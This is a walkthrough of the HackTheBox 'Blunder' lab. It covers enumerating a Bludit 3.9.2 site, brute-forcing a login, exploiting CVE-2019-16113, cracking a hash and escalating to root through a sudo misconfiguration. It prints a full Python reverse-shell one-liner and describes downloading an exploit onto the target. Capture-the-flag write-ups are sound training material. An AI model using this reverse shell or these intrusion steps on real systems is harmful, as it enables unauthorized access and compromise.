🟢Blunder
Information:
Os: Linux
Difficulty: Easy
IP : 10.10.10.191
Enumaration
NMAP
nmap -sC -sS -sV -O -A -v -v 10.10.10.191
output :
PORT STATE SERVICE REASON VERSION
21/tcp closed ftp reset ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
let's check the website (apache2 running on port 80)

apparently is a site about interesting facts
looking at the page source code we will have :

and this caught my attention :

we know the version is 3.9.2, but we need to find out which is the CMS
making a fuzzing we found some files with the name "bl-kernel"
searching over this structure I found :

ok, the site is made in bludit 3.9.2

we can try to use an exploit from CVE-2019-16113, and get a RCE (Remote Code Execution)
BUT
this exploit needs the user and password, which we do not know
so let's find out
for this, we can use :

code:
this code takes a wordlist and tests all the words to find the password
but, we still need the user...
we return to the enumeration stage, we can find a file named "todo.txt".

now we know that there is a user called fergus
now let's test the passwords
but to generate a list of passwords that makes sense, I will use a tool called "cewl", which takes the words of a site and assembles a list
cewl 10.10.10.191 -w wordlist.txt

now let's use that code to find out the password
python3 10.10.191 fergus wordlist.txt


finally, we have the password, now use the exploit from CVE-2019-16113
Getting Shell




now we have a shell, but very bad
improving this shell
to improve this shell, we will make this connection start another shell, for this we will use :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
(changing the ip)

(on the right screen we have the good shell, but not a tty)
to have a tty, run the command :
python -c 'import pty;pty.spawn("/bin/bash")'
now we have to try to get access to some users (www-data don't have access to the user flag)
looking for files in the www-data, I found
/var/www/bludit-3.10.0a/bl-content/databases/users.php
here we see the user (hugo) and the encrypted password
now let's break the password encryption
we need to find out which encryption was used
for this I will use a site called tunnelsup
https://www.tunnelsup.com/hash-analyzer/

breaking ( https://www.dcode.fr/sha1-hash ) :

now we have the password, let's change our user

Privilege Escalation
running
sudo -l
to see what command we can run as root without password, we see that the hugo user can use the command "(ALL, !root) /bin/bash"

searching for about this, we see that there is an exploit to escalate the privilege

Let's use it
I will download the script to my machine, and start a python http server in my folder, so in the target machine, I can download it from my ip.

now we are root, just catch the flag.
Last updated